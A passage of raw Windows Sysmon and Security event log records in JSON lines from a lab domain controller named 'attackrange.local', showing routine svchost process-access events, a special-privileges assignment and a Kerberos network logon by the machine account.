08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6623,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6624,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6625,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220698,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA394A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa394a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220699,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA394A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50235\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa394a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50235","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6626,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6627,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 